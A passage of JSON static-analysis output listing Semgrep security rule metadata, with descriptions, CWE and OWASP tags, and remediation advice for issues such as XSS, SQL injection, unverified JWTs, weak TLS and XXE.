dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url)\n - [https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html](https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"helpUri":"https://semgrep.dev/r/typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","id":"typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","name":"typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","id":"csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","name":"csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","HIGH CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pg.uptrace.dev/queries/](https://pg.uptrace.dev/queries/)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"helpUri":"https://semgrep.dev/r/go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","id":"go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","name":"go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later."},"help":{"markdown":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.insecure-ssl-version.insecure-ssl-version)\n - [https://www.acunetix.com/blog/web-security-zone/hardening-nginx/](https://www.acunetix.com/blog/web-security-zone/hardening-nginx/)\n - [https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/](https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/)\n","text":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.insecure-ssl-version.insecure-ssl-version","id":"generic.nginx.security.insecure-ssl-version.insecure-ssl-version","name":"generic.nginx.security.insecure-ssl-version.insecure-ssl-version","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.insecure-ssl-version.insecure-ssl-version"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string."},"help":{"markdown":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql)\n - [https://docs.djangoproject.com/en/3.0/ref/models/expressions/#django.db.models.expressions.RawSQL](https://docs.djangoproject.com/en/3.0/ref/models/expressions/#django.db.models.expressions.RawSQL)\n","text":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","id":"python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","name":"python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","id":"ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","name":"ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms."},"help":{"markdown":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/clojure.lang.security.use-of-md5.use-of-md5)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n","text":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms."},"helpUri":"https://semgrep.dev/r/clojure.lang.security.use-of-md5.use-of-md5","id":"clojure.lang.security.use-of-md5.use-of-md5","name":"clojure.lang.security.use-of-md5.use-of-md5","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: clojure.lang.security.use-of-md5.use-of-md5"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"helpUri":"https://semgrep.dev/r/python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","id":"python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","name":"python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.sqli.pgx-sqli.pgx-sqli)\n - [https://github.com/jackc/pgx](https://github.com/jackc/pgx)\n - [https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool](https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool)\n","text":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)"},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","id":"go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","name":"go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.sqli.pgx-sqli.pgx-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize."},"help":{"markdown":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint)\n - [https://docs.angularjs.org/api/ng/function/angular.element](https://docs.angularjs.org/api/ng/function/angular.element)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","id":"javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","name":"javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\"."},"help":{"markdown":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\"."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","id":"terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","name":"terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases."},"helpUri":"https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","id":"python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","name":"python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`."},"help":{"markdown":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode)\n - [https://cwe.mitre.org/data/definitions/327.html](https://cwe.mitre.org/data/definitions/327.html)\n - [https://learn.microsoft.com/en-us/dotnet/fundamentals/code-analysis/quality-rules/ca5358](https://learn.microsoft.com/en-us/dotnet/fundamentals/code-analysis/quality-rules/ca5358)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","id":"csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","name":"csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`."},"help":{"markdown":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate)\n - [https://www.php.net/manual/en/function.openssl-decrypt.php](https://www.php.net/manual/en/function.openssl-decrypt.php)\n","text":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`."},"helpUri":"https://semgrep.dev/r/php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","id":"php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","name":"php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","properties":{"precision":"very-high","tags":["CWE-252: Unchecked Return Value","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pg.pg-empty-password.pg-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pg.pg-empty-password.pg-empty-password","id":"go.secrets.pg.pg-empty-password.pg-empty-password","name":"go.secrets.pg.pg-empty-password.pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pg.pg-empty-password.pg-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface."},"help":{"markdown":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication)\n","text":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface."},"helpUri":"https://semgrep.dev/r/swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","id":"swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","name":"swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","properties":{"precision":"very-high","tags":["CWE-296: Improper Following of a Certificate's Chain of Trust","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead."},"help":{"markdown":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object)\n - [https://docs.python.org/3/library/urllib.request.html#urllib.request.Request](https://docs.python.org/3/library/urllib.request.html#urllib.request.Request)\n","text":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","id":"python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","name":"python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader)\n - [https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html](https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html)\n - [https://www.php.net/libxml_disable_entity_loader](https://www.php.net/libxml_disable_entity_loader)\n - [https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php)\n","text":"The application is using an XML 